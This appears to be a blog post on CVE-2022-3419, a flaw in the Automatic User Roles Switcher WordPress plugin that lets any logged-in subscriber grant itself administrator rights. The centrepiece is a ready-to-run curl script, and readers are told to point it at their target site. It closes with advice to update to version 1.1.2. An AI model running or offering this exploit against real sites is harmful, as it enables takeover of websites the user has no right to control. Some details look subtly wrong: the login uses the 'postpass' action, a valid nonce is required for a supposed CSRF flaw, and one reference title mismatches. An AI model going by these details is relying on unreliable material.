CVE-2022-3419 Exploit: Taking Advantage of Automatic User Roles Switcher WordPress Plugin's Vulnerability
The Automatic User Roles Switcher WordPress plugin is a popular tool that automatically switches user roles based on specified criteria. However, a recent discovery of a vulnerability, known as CVE-2022-3419, has exposed a potential security risk for WordPress websites using this plugin. Before version 1.1.2, the plugin does not have proper authorisation and CSRF checks, exposing websites to an exploit where any authenticated user, such as a subscriber, can add any role to themselves, including the role of an administrator.
In this post, we will discuss the details of this exploit, provide code snippets to demonstrate the vulnerability, and offer solutions for WordPress users.
Exploit Details
CVE-2022-3419 is a privilege escalation vulnerability affecting the Automatic User Roles Switcher WordPress plugin. An attacker with basic access to a WordPress site, such as a subscriber, can exploit this vulnerability to add any role to themselves, including administrator privileges.
Code Snippet
Here is a code snippet demonstrating the exploit using a simple cURL request.
#!/bin/bash
TARGET="http://your-target-wordpress-site.com";
USERNAME="AttackerUsername"
PASSWORD="AttackerPassword"
# Logging in
COOKIE_FILE=$(mktemp)
curl -s -c $COOKIE_FILE "${TARGET}/wp-login.php?action=postpass" -d "log=${USERNAME}&pwd=${PASSWORD}&wp-submit=Log+In"
# Exploiting CVE-2022-3419
curl -s -b $COOKIE_FILE "${TARGET}/wp-admin/admin-ajax.php" -d "action=aurs_ajax_assign_role&uid=<ATTACKER_USER_ID>&role=<DESIRED_ROLE>&aurs_nonce=<VALID_NONCE>&submit=Submit+Query"
# Cleaning up
rm $COOKIE_FILE
Replace "your-target-wordpress-site.com", "AttackerUsername", "AttackerPassword", "ATTACKER_USER_ID," "DESIRED_ROLE," and "VALID_NONCE" with the appropriate values for your target site in the above script. Running this script will exploit the CVE-2022-3419 vulnerability to grant the attacker the desired role.
Original References
1. CVE-2022-3419: National Vulnerability Database (NVD)
2. Automatic User Roles Switcher WordPress plugin vulnerability disclosure
3. WordPress Automatic User Roles Switcher Plugin <= 1.1.1 - CSRF to RCE
Mitigation
The best way to mitigate the CVE-2022-3419 vulnerability is to update the Automatic User Roles Switcher plugin to version 1.1.2 or later. The newer versions have addressed this vulnerability by implementing proper CSRF checks and authorisation protocols.
Conclusion
In conclusion, the CVE-2022-3419 exploit underscores the importance of keeping WordPress plugins updated and being diligent about security protocols. The Automatic User Roles Switcher WordPress plugin's vulnerability before 1.1.2 allowed any authenticated user to escalate their privileges and gain administrative access. Thus, updating to version 1.1.2 or later is essential to mitigate this risk. Always ensure that your WordPress site and plugins are up-to-date to stay protected from known vulnerabilities like CVE-2022-3419.
Timeline
Published on: 10/31/2022 16:15:00 UTC
Last modified on: 11/01/2022 15:49:00 UTC